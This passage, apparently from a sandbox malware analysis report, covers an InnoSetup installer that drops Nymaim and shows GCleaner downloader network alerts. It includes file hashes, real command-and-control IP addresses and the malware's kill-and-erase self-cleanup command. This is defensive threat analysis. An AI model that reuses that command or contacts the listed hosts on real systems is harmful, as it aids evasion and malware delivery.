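(size, hashes, 8-bit Shannon entropy, 'looks encrypted') for bytes in memory.
Not Joe Sandbox's own code; the threshold below is an assumption."""
import hashlib
import math
from collections import Counter

# Assumed threshold (not the sandbox's documented rule): entropy this close to
# the 8.0 bits/byte maximum is treated as packed or encrypted content.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte; 0.0 for empty or single-symbol data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(data: bytes) -> dict:
    """Build the same fields a dropped-file entry carries, hashes upper-cased
    to match the report's formatting."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": entropy,
        "encrypted": entropy >= ENCRYPTED_THRESHOLD,
    }


def triage_file(path: str) -> dict:
    """Same record for a file on disk (e.g. a dropped sample you have locally)."""
    with open(path, "rb") as fh:
        return triage(fh.read())


def pseudo_random_blob(length: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic high-entropy bytes built by chaining SHA-256; constructed
    here only so the example runs offline without a real encrypted payload."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:length])


# Constructed inputs taken from the report's own previews of two dropped files.
SAMPLE_ONE_BYTE = b"0"
SAMPLE_17_BYTES = b"UwUoooIIrwgh24uuU"
SAMPLE_RANDOM = pseudo_random_blob(65536)

if __name__ == "__main__":
    for label, blob in (("one-byte", SAMPLE_ONE_BYTE),
                        ("17-byte", SAMPLE_17_BYTES),
                        ("pseudo-random", SAMPLE_RANDOM)):
        rec = triage(blob)
        print(f"{label:14} size={rec['size']:6d} entropy={rec['entropy']:.6f} "
              f"encrypted={rec['encrypted']} md5={rec['md5']}")
```

Running it prints entropy 0.0 for the one-byte file and 3.175123 for the 17-byte file, matching the values in the listing, which is a quick sanity check that the preview shown for a small dropped file is its complete content.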
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.986537727068986
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:2460138
                MD5:71f3a21ccd6e54f8178d3fb65f4849b9
                SHA1:b24f88c179a8e0777bffbcc4c9f969fb4d32d148
                SHA256:7dbb8aa3f00f0f0d24acf0b1bdb73d05f422e90fd46c2a6fed0b44fe9a0a721a
                SHA512:e1aaf1fc9dad13243ff435730a215bcd45b8e026e55d9fd38be74cef81b213ce56c33ac00b46c3707e048a1e4b3de788f7f236121406866b0f8786e9ec6c5626
                SSDEEP:49152:aGoOZy1S1FBih4gcjlZZQPTbncg1Gk1QBfEkULNQ69Z3yS8/5csoZBZH:aGoOZcS1FBih4TrYrcg1Z1UfGL2gZiS3
                TLSH:08B533C7F884C63DFD6851745E7BA17100F82CFC2E20582E27ECBF9B5276441695AB29
                File Content Preview:MZP.....................@.......................Inno..%.=v..............!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:ecccdac6c6c6d464
                Entrypoint:0x40968c
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:da86ff6d22d7419ae7f10724a403dffd
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F3280C36F8Fh
                call 00007F3280C3823Ah
                call 00007F3280C3A42Dh
                call 00007F3280C3A474h
                call 00007F3280C3C9C3h
                call 00007F3280C3CAB2h
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409D71h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409D27h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F3280C3D43Fh
                call 00007F3280C3CFFEh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F3280C3A8E8h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F3280C3703Bh
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 004070C4h
                call 00007F3280C3AF4Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409D05h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F3280C3B023h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F3280C3B15Dh
                mov edx, esi
                mov ecx, 0000000Ch
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc000           0x8c8         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10000          0xd5a0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf000           0x0           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xe000           0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
CODE    0x1000           0x8e00        0x8e00    False     0.6218364876760564  data       6.600437911517656   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA    0xa000           0x248         0x400     False     0.3115234375        data       2.7204325510923035  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS     0xb000           0xe64         0x0       False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0xc000           0x8c8         0xa00     False     0.389453125         data       4.2507970587946735  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0xd000           0x8           0x0       False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0xe000           0x18          0x200     False     0.052734375         data       0.1991075177871819  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0xf000           0x86c         0x0       False     0                   empty      0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x10000          0xd5a0        0xd600    False     0.2876204731308411  data       5.7136247823841     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                  Language  Country
RT_ICON        0x1042c  0x1628  Device independent bitmap graphic, 64 x 128 x 8, image size 4608      English   United States
RT_ICON        0x11a54  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2688       English   United States
RT_ICON        0x128fc  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1152       English   United States
RT_ICON        0x131a4  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 672        English   United States
RT_ICON        0x1386c  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 320        English   United States
RT_ICON        0x13dd4  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896    English   United States
RT_ICON        0x17ffc  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600      English   United States
RT_ICON        0x1a5a4  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224      English   United States
RT_ICON        0x1b64c  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400      English   United States
RT_ICON        0x1bfd4  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088      English   United States
RT_STRING      0x1c43c  0x2f2   data
RT_STRING      0x1c730  0x30c   data
RT_STRING      0x1ca3c  0x2ce   data
RT_STRING      0x1cd0c  0x68    data
RT_STRING      0x1cd74  0xb4    data
RT_STRING      0x1ce28  0xae    data
RT_GROUP_ICON  0x1ced8  0x92    data                                                                  English   United States
RT_VERSION     0x1cf6c  0x3a8   data                                                                  English   United States
RT_MANIFEST    0x1d314  0x289   XML 1.0 document, ASCII text, with CRLF line terminators              English   United States
DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll    MessageBoxA
oleaut32.dll  VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll  WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetEndOfFile, RemoveDirectoryA, ReadFile, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll    TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll  InitCommonControls
advapi32.dll  AdjustTokenPrivileges
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                 Protocol  SID      Message                                              Source Port  Dest Port  Source IP        Dest IP
12/09/22-11:02:15.223774  TCP       2041920  ET TROJAN GCleaner Downloader Activity M8            49691        80         192.168.2.4      45.139.105.171
12/09/22-11:02:15.529889  TCP       2852925  ETPRO TROJAN GCleaner Downloader - Payload Response  80           49692      107.182.129.235  192.168.2.4
                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106


Target ID: 0
Start time: 11:02:06
Start date: 09/12/2022
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x400000
File size: 2460138 bytes
MD5 hash: 71F3A21CCD6E54F8178D3FB65F4849B9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 1
Start time: 11:02:07
Start date: 09/12/2022
Path: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256
Imagebase: 0x400000
File size: 704000 bytes
MD5 hash: 2C3832FDF847813369EC960CD39C8265
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 2
Start time: 11:02:09
Start date: 09/12/2022
Path: C:\Program Files (x86)\PrintFolders\ntFolders.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
Imagebase: 0x400000
File size: 3602504 bytes
MD5 hash: D9A39F6C4EEDC8F1B89E30D35012D6B4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

Target ID: 3
Start time: 11:02:13
Start date: 09/12/2022
Path: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
Wow64 process (32bit): true
Commandline:
Imagebase: 0x11d0000
File size: 73728 bytes
MD5 hash: 3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 50%, ReversingLabs
Reputation: high

Target ID: 4
Start time: 11:02:47
Start date: 09/12/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
Imagebase: 0xd90000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 5
Start time: 11:02:47
Start date: 09/12/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 6
Start time: 11:02:47
Start date: 09/12/2022
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /im "ntFolders.exe" /f
Imagebase: 0x13d0000
File size: 74752 bytes
MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                No disassembly